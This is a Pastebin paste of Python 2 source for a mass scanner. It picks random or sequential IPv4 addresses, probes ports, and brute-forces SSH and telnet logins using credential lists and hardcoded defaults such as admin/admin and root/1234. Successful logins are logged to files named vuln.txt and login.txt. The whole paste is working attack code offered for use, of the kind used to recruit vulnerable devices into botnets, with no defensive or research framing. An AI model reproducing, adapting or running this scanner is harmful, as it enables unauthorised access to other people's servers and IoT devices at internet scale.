API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Aug 16th, 2016
151
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 20.50 KB | None | 0 0
raw download clone embed print report
  1. switches = ''
  2. print('\n ----PARAMETERS----')
  3. print('***********************************************')
  4. if options.targetPorts != None:
  5. print('[!] Scanning for port(s): ' + str(options.targetPorts))
  6. switches = switches + ' -p ' + str(options.targetPorts)
  7. if options.aClass != None:
  8. print('[!] Scanning using first octet: ' + str(options.aClass))
  9. # switches = switches + ' -a ' + str(options.aClass)
  10. if options.bClass != None:
  11. print('[!] Scanning using second octet: ' + str(options.bClass))
  12. # switches = switches + ' -b ' + str(options.bClass)
  13. if options.cClass != None:
  14. print('[!] Scanning using third octet: ' + str(options.cClass))
  15. # switches = switches + ' -c ' + str(options.cClass)
  16. if options.brute != False:
  17. print('[!] Using ssh bruteforce')
  18. switches = switches + ' -l'
  19. if options.bruteTel != False:
  20. print('[!] Using telnet bruteforce')
  21. switches = switches + ' -T'
  22. if options.bruting != False:
  23. print('[!] Showing addresses being bruteForced')
  24. switches = switches + ' -1'
  25. if options.scanned != False:
  26. print('[!] Showing showing all scan fails')
  27. switches = switches + ' -2'
  28. if options.passAttempt != False:
  29. print('[!] Showing bruteforce attempts')
  30. switches = switches + ' -3'
  31. if options.openPort != False:
  32. print('[!] Showing addresses with open ports')
  33. switches = switches + ' -4'
  34. if options.verbose != False:
  35. print('[!] Showing all output')
  36. switches = switches + ' -V'
  37. if options.fixed != None:
  38. print('[!] Using a fixed login option: ' + str(options.fixed))
  39. switches = switches + ' -f ' + str(options.fixed)
  40. if options.bios != False:
  41. print('[!] Creating bios output')
  42. switches = switches + ' -B'
  43. if options.timeOut != None:
  44. print('[!] Using timeout: ' + str(options.timeOut))
  45. switches = switches + ' -o ' + str(options.timeOut)
  46. fName = os.path.realpath(__file__)
  47. print('***********************************************\n')
  48.  
  49.  
  50.  
  51. global fourth
  52. fourth = 0
  53.  
  54. def go():
  55. # print('[!] NAILED IT!')
  56. go = True
  57.  
  58. def gen():
  59. global log
  60. global firstBios
  61. global secondBios
  62. global thirdBios
  63. global fourthBios
  64. global threads
  65. #print('started gen')
  66. try:
  67. parser = optparse.OptionParser("%prog -t <target host(s)> -p <target port(s)>")
  68. parser.add_option('-t', dest='targetHosts', type='string', help='Specify the target host(s); Separate them by commas or enter \'scan\' to scan random addresses')
  69. parser.add_option('-p', dest='targetPorts', type='string', help='Specify the target port(s); Separate them by commas----use \'all\' to scan 1-65535')
  70. parser.add_option('-a', dest='aClass', type='string', help='Specify the 1st octet')
  71. parser.add_option('-b', dest='bClass', type='string', help='Specify the 2nd octet')
  72. parser.add_option('-c', dest='cClass', type='string', help='Specify the 3rd octet')
  73. parser.add_option('-s', dest='threads', type='int', help='Specify number of threads for scanning')
  74. parser.add_option('-l', action='store_true', dest='brute', default=False, help='Brute force ssh')
  75. parser.add_option('-T', action='store_true', dest='bruteTel', default=False, help='Brute force telnet')
  76. parser.add_option('-1', action='store_true', dest='bruting', default=False, help='Displays addresses that are being brute forced')
  77. parser.add_option('-2', action='store_true', dest='scanned', default=False, help='Displays address that could not be connected to')
  78. parser.add_option('-3', action='store_true', dest='passAttempt', default=False, help='Displays each password attempt during brute force')
  79. parser.add_option('-4', action='store_true', dest='openPort', default=False, help='Displays when an address has the searched port open')
  80. parser.add_option('-V', action='store_true', dest='verbose', default=False, help='Verbose mode')
  81. parser.add_option('-f', dest='fixed', type='string', help='Specify a fixed login(1, 2, 3, 4)')
  82. parser.add_option('-B', action='store_true', dest='bios', default=False, help='Create a bios for vuln using iterating IP gen')
  83. parser.add_option('-o', dest='timeOut', type='float', help='Set a timeout value for scanning')
  84. parser.add_option('-M', action='store_true', dest='master', default=False, help='User multiprocess scanning')
  85. parser.add_option('-C', action='store_true', dest='child', default=False, help='DO NOT USE')
  86. (options, args) = parser.parse_args()
  87. if options.threads != None:
  88. threads = options.threads
  89. global fourth
  90. going = True
  91. processes = 0
  92. while going == True:
  93. if (options.aClass == None):
  94. if options.bios == False:
  95. first = randint(1, 254)
  96. else:
  97. first = firstBios
  98. if secondBios >= 255:
  99. firstBios = firstBios + 1
  100. secondBios = 1
  101. if firstBios >= 255:
  102. # print('[!] Reached maximum address allocation: EXITING')
  103. going = False
  104. break
  105. # sys.exit()
  106. else:
  107. first = options.aClass
  108. if options.bios != False:
  109. if secondBios >= 255:
  110. # print('[!] Reached maximum address allocation: EXITING')
  111. going = False
  112. break
  113. # sys.exit()
  114. if (options.bClass == None):
  115. if options.bios == False:
  116. second = randint(1, 254)
  117. else:
  118. second = secondBios
  119. if thirdBios >= 255:
  120. secondBios = secondBios + 1
  121. thirdBios = 1
  122. else:
  123. second = options.bClass
  124. if options.bios != False:
  125. if thirdBios >= 255:
  126. # print('[!] Reached maximum address allocation: EXITING')
  127. going = False
  128. break
  129. # sys.exit()
  130. if (options.cClass == None):
  131. if options.bios == False:
  132. third = randint(1, 254)
  133. else:
  134. third = thirdBios
  135. if fourthBios >= 255:
  136. thirdBios = thirdBios + 1
  137. fourthBios = 1
  138. else:
  139. third = options.cClass
  140. if options.bios != False:
  141. if fourthBios >= 255:
  142. # print('[!] Reached maximum address allocation: EXITING')
  143. going = False
  144. break
  145. # sys.exit()
  146. if options.bios == False:
  147. fourth = randint(1, 254)
  148. else:
  149. fourth = fourthBios
  150. fourthBios = fourthBios + 1
  151. targetHost = str(first) + '.' + str(second) + '.' + str(third) + '.' + str(fourth)
  152. targetPorts = str(options.targetPorts).split(',')
  153. if options.master == False:
  154. for targetPort in targetPorts:
  155. conn(targetHost, int(targetPort))
  156. else:
  157. command = str(sys.executable) + ' ' + str(fName) + ' -t ' + str(targetHost) + str(switches) + ' -C &'
  158. try:
  159. os.system(command)
  160. # subprocess.Popen(command, shell = True)
  161. # print(command)
  162. processes = processes + 1
  163. except:
  164. print('[!] Couldn\'t start separate process: ' + str(targetHost))
  165. # print('[!] ' + targetHost + '|' + str(targetPort))
  166. if options.master != False:
  167. print('[!] Finished assigning jobs | processes started: ' + str(processes) + '\n')
  168. except KeyboardInterrupt:
  169. print('Scanning stopped')
  170. sys.exit()
  171.  
  172. def conn(targetHost, targetPort):
  173. global threads
  174. parser = optparse.OptionParser("%prog -t <target host(s)> -p <target port(s)>")
  175. parser.add_option('-t', dest='targetHosts', type='string', help='Specify the target host(s); Separate them by commas or enter \'scan\' to scan random addresses')
  176. parser.add_option('-p', dest='targetPorts', type='string', help='Specify the target port(s); Separate them by commas----use \'all\' to scan 1-65535')
  177. parser.add_option('-a', dest='aClass', type='string', help='Specify the 1st octet')
  178. parser.add_option('-b', dest='bClass', type='string', help='Specify the 2nd octet')
  179. parser.add_option('-c', dest='cClass', type='string', help='Specify the 3rd octet')
  180. parser.add_option('-s', dest='threads', type='int', help='Specify number of threads for scanning')
  181. parser.add_option('-l', action='store_true', dest='brute', default=False, help='Brute force ssh')
  182. parser.add_option('-T', action='store_true', dest='bruteTel', default=False, help='Brute force telnet')
  183. parser.add_option('-1', action='store_true', dest='bruting', default=False, help='Displays addresses that are being brute forced')
  184. parser.add_option('-2', action='store_true', dest='scanned', default=False, help='Displays address that could not be connected to')
  185. parser.add_option('-3', action='store_true', dest='passAttempt', default=False, help='Displays each password attempt during brute force')
  186. parser.add_option('-4', action='store_true', dest='openPort', default=False, help='Displays when an address has the searched port open')
  187. parser.add_option('-V', action='store_true', dest='verbose', default=False, help='Verbose mode')
  188. parser.add_option('-f', dest='fixed', type='string', help='Specify a fixed login(1, 2, 3, 4)')
  189. parser.add_option('-B', action='store_true', dest='bios', default=False, help='Create a bios for vuln using iterating IP gen')
  190. parser.add_option('-o', dest='timeOut', type='float', help='Set a timeout value for scanning')
  191. parser.add_option('-M', action='store_true', dest='master', default=False, help='User multiprocess scanning')
  192. parser.add_option('-C', action='store_true', dest='child', default=False, help='DO NOT USE')
  193. (options, args) = parser.parse_args()
  194. if options.threads != None:
  195. threads = options.threads
  196. co = True
  197.  
  198. scan = False
  199. if targetHost == 'scan':
  200. targetPort = str(options.targetPorts).split(',')
  201. # print(options.targetHosts) print(targetHost)
  202. print('Scanning for ports: ' + str(targetPort))
  203. count = 0
  204. while count < 1:
  205. try:
  206. conn = socket(AF_INET, SOCK_STREAM)
  207. # if options.timeOut != None:
  208. # conn.setsockettimeout(int(options.timeOut))
  209. if targetHost == 'scan':
  210. targetHost = gen()
  211. count = count - 1
  212. scan = True
  213. for port in targetPort:
  214. try:
  215. conn.connect((targetHost, int(port)))
  216. conn.close()
  217. except Exception, e:
  218. if options.scanned != False or options.verbose != False:
  219. print '[!] Connection to ' + targetHost + ' port ' + str(port) + ' failed: ' + str(e)
  220. co = False
  221. conn.close()
  222. conn = socket(AF_INET, SOCK_STREAM)
  223.  
  224. else:
  225. conn.connect((targetHost, targetPort))
  226. conn.close()
  227. if scan == False:
  228. if options.openPort != False or options.verbose != False and options.bios == False:
  229. print '[+] Connection to ' + targetHost + ' port ' + str(targetPort) + ' succeeded!'
  230. elif options.bios != False:
  231. print(targetHost)
  232. if options.bios == False:
  233. log = open('log.txt', 'a')
  234. log.write('[+] Connection to ' + targetHost + ' port ' + str(targetPort) + ' succeeded!\n')
  235. else:
  236. log = open('bios.txt', 'a')
  237. log.write(targetHost + '\n')
  238. log.close()
  239. elif co == True:
  240. if options.openPort != False or options.verbose != False and options.bios == False:
  241. print '[+] Connection to ' + targetHost + ' port ' + str(port) + ' succeeded!'
  242. log = open('log.txt', 'a')
  243. log.write('[+] Connection to ' + targetHost + ' port ' + str(port) + ' succeeded!\n')
  244. elif options.bios != False:
  245. print(targetHost)
  246. log = open('bios.txt', 'a')
  247. log.write(targetHost + '\n')
  248. log.close()
  249. if options.bruteTel != False and int(targetPort) == 23:
  250. br = True
  251. good = False
  252. HOST = targetHost
  253. if options.bruting != False or options.verbose != False:
  254. print('Attempting telnet brute force: ' + str(HOST))
  255. tn = telnetlib.Telnet(HOST)
  256. tn.read_until('login: ')
  257. # if 'closed' in resp:
  258. # print('[!] Closed in resp')
  259. # br = False
  260. # good = False
  261. # pass
  262. for username in usernames:
  263. for password in passwords:
  264. if options.passAttempt != False or options.verbose != False:
  265. print('[!] Trying: ' + HOST + ' | username: ' + username + ' | password: ' + password)
  266. user = username
  267. # try:
  268. tn.write(user + "\n")
  269. # except:
  270. # print('[!] Username invalid')
  271. # br = False
  272. try:
  273. # if password:
  274. # print('[!] waiting for password prompt')
  275. tn.read_until('Password: ')
  276. # print('[!] got password prompt')
  277. tn.write(password + "\n")
  278. # print('[!] presented password')
  279. # print('[!] Sending verification command')
  280. tn.write("ls\n")
  281. tn.write("exit\n")
  282. # print('[!] Sent command')
  283. # print('[!] read all')
  284. br = True
  285. good = True
  286. # print('[!] Changed variables')
  287. resp = tn.read_all()
  288. # print('[!] set resp variable')
  289. # print(resp)
  290. if 'Authentication failed' in resp:
  291. # print('[!] Authentication failed')
  292. br = False
  293. good = False
  294. pass
  295. elif 'Authentication failed' not in resp:
  296. br = True
  297. good = True
  298. break
  299. else:
  300. br = False
  301. good = False
  302. pass
  303. except:
  304. br = False
  305. good = False
  306. # print('[!] Password invalid')
  307. pass
  308. if br == True:
  309. break
  310. if 'logout' in resp:
  311. print('Succeeded: ' + targetHost + '|' + str(username) + '|' + str(password) + '|' + str(targetPort))
  312. log=open('vuln.txt', 'a')
  313. log.write(targetHost + '|' + str(username) + '|' + str(password) + '|' + str(targetPort) + '\n')
  314. log.close()
  315. tn.close()
  316. if options.brute != False and int(targetPort) == 22:
  317. # ssh = paramiko.Transport((targetHost, targetPort))
  318. if options.bruting != False or options.verbose != False:
  319. print('Attempting ssh brute force: ' + targetHost)
  320. br = True
  321. good = False
  322. if options.fixed == None:
  323. for username in usernames:
  324. # print('[!] Using username: ' + str(username))
  325. for password in passwords:
  326. br = True
  327. if options.passAttempt != False or options.verbose != False:
  328. print('Trying ' + targetHost + ' | username: ' + str(username) + ' | password: ' + password)
  329. try:
  330. # ssh.connect(username=username, password=password)
  331. ssh = paramiko.SSHClient()
  332. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  333. paramiko.util.log_to_file("filename.log")
  334. ssh.connect(targetHost, port=int(targetPort), username=username, password=password, timeout=10)
  335. ssh.close()
  336. go()
  337. br = True
  338. # print('[!] Set br to True')
  339. good = True
  340. break
  341. except:
  342. ssh.close()
  343. br = False
  344. pass
  345. if br == True:
  346. # print('[!] Using br')
  347. break
  348. #END OF FOR LOOP
  349. # print('[!] Made it to else')
  350. else:
  351. # print('[!] Entered else')
  352. if options.fixed == '1':
  353. username = 'admin'
  354. password = 'admin'
  355. elif options.fixed == '2':
  356. username = 'admin'
  357. password = '1234'
  358. elif options.fixed == '3':
  359. username = 'root'
  360. password = 'root'
  361. elif options.fixed == '4':
  362. username = 'root'
  363. password = '1234'
  364. else:
  365. print('[!] That is not a fixed login option')
  366. sys.exit()
  367. br = True
  368. if options.passAttempt != False or options.verbose != False:
  369. print('Trying: ' + targetHost + ' | username: ' + str(username) + ' | password: ' + str(password) + ' | port: ' + str(targetPort))
  370. try:
  371. # ssh.connect(username=username, password=password)
  372. ssh = paramiko.SSHClient()
  373. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  374. paramiko.util.log_to_file("filename.log")
  375. ssh.connect(targetHost, port=int(targetPort), username=username, password=password, timeout=10)
  376. ssh.close()
  377. go()
  378. br=True
  379. good=True
  380. # print('[!] Good is True')
  381. except:
  382. ssh.close()
  383. br=False
  384. # print('[!] Good is false')
  385. good=False
  386. pass
  387. # if br == True:
  388. # print('[!] br is true')
  389. # print('[!] Made it past else')
  390. output = 'nope'
  391. # print(good)
  392. if good == True:
  393. # print('[!] good is true')
  394. # stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  395. # output = stdout.read()
  396. # print(output)
  397. # if 'inet' in output:
  398. print('Succeeded: ' + targetHost + '|' + username + '|' + password + '|' + str(targetPort))
  399. log = open('login.txt', 'a')
  400. log.write(targetHost + '|' + username + '|' + password + '|' + str(targetPort) + '\n')
  401. log.close()
  402. # ssh.close()
  403. except Exception, e:
  404. if scan == False:
  405. if options.scanned != False or options.verbose != False:
  406. print '[!] Connection to ' + targetHost + ' port ' + str(targetPort) + ' failed: ' + str(e)
  407. finally:
  408. # if scan == False:
  409. # conn.close()
  410. count = count + 1
  411. if scan == True:
  412. targetHost = 'scan'
  413.  
  414. def main():
  415. global scan
  416. global threads
  417. parser = optparse.OptionParser("%prog -t <target host(s)> -p <target port(s)>")
  418. parser.add_option('-t', dest='targetHosts', type='string', help='Specify the target host(s); Separate them by commas or enter \'scan\' to scan random addresses')
  419. parser.add_option('-p', dest='targetPorts', type='string', help='Specify the target port(s); Separate them by commas----use \'all\' to scan 1-65535')
  420. parser.add_option('-a', dest='aClass', type='string', help='Specify the 1st octet')
  421. parser.add_option('-b', dest='bClass', type='string', help='Specify the 2nd octet')
  422. parser.add_option('-c', dest='cClass', type='string', help='Specify the 3rd octet')
  423. parser.add_option('-s', dest='threads', type='int', help='Specify number of threads for scanning')
  424. parser.add_option('-l', action='store_true', dest='brute', default=False, help='Brute force ssh')
  425. parser.add_option('-T', action='store_true', dest='bruteTel', default=False, help='Brute force telnet')
  426. parser.add_option('-1', action='store_true', dest='bruting', default=False, help='Displays addresses that are being brute forced')
  427. parser.add_option('-2', action='store_true', dest='scanned', default=False, help='Displays address that could not be connected to')
  428. parser.add_option('-3', action='store_true', dest='passAttempt', default=False, help='Displays each password attempt during brute force')
  429. parser.add_option('-4', action='store_true', dest='openPort', default=False, help='Displays when an address has the searched port open')
  430. parser.add_option('-V', action='store_true', dest='verbose', default=False, help='Verbose mode')
  431. parser.add_option('-f', dest='fixed', type='string', help='Specify a fixed login(1, 2, 3, 4)')
  432. parser.add_option('-B', action='store_true', dest='bios', default=False, help='Create a bios for vuln using iterating IP gen')
  433. parser.add_option('-o', dest='timeOut', type='float', help='Set a timeout value for scanning')
  434. parser.add_option('-M', action='store_true', dest='master', default=False, help='User multiprocess scanning')
  435. parser.add_option('-C', action='store_true', dest='child', default=False, help='DO NOT USE')
  436. (options, args) = parser.parse_args()
  437. if options.threads != None:
  438. threads = options.threads
  439. print('Scanning threads: ' + str(options.threads))
  440. if options.brute != False:
  441. if options.child == False:
  442. # print('Using ssh brute force')
  443. fuck = True
  444. if options.bruteTel != False:
  445. if options.child == False:
  446. # print('Using telnet brute force')
  447. fuck = True
  448. if (options.targetHosts == None) | (options.targetPorts == None):
  449. print parser.usage
  450. exit(0)
  451.  
  452. targetHosts = str(options.targetHosts).split(',')
  453. if (options.targetPorts != 'all'):
  454. targetPorts = str(options.targetPorts).split(',')
  455. elif (options.targetHosts != 'scan'):
  456. targetPorts = range(1, 65535)
  457. if (options.targetPorts == 'all'):
  458. if options.timeOut != None:
  459. setdefaulttimeout(options.timeOut)
  460. print('Using timout: ' + str(options.timeOut))
  461. else:
  462. setdefaulttimeout(5)
  463. else:
  464. if options.timeOut != None:
  465. setdefaulttimeout(options.timeOut)
  466. if options.child == False:
  467. print('Using timout: ' + str(options.timeOut))
  468. else:
  469. setdefaulttimeout(5)
  470. if options.targetHosts == 'scan':
  471. #print('creating workers')
  472. try:
  473. # print('entered try')
  474. create_workers()
  475. create_jobs()
  476. except KeyboardInterrupt:
  477. print('enteres except')
  478. print('Stopping all threads')
  479. sys.exit()
  480. else:
  481. for targetHost in targetHosts:
  482. for targetPort in targetPorts:
  483. conn(targetHost, int(targetPort))
  484. #print ''
  485.  
  486. #Create worker threads
  487. def create_workers():
  488. global threads
  489.  
  490. for _ in range(NUMBER_OF_THREADS):
  491. t = threading.Thread(target=work)
  492. t.daemon = True
  493. t.start()
  494. #Do the next job in the queue
  495. def work():
  496. while True:
  497. x = queue.get()
  498. if x == 1:
  499.  
  500. try:
  501. gen()
  502. except KeyboardInterrupt:
  503. sys.exit()
  504. queue.task_done()
  505. #Each list item is a new job
  506. def create_jobs():
  507. for x in JOB_NUMBER:
  508. queue.put(1)
  509. # queue.put(1)
  510. queue.join()
  511.  
  512. #if __name__ == '__main__':
  513. try:
  514. main()
  515. except KeyboardInterrupt:
  516. print('fuck')
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!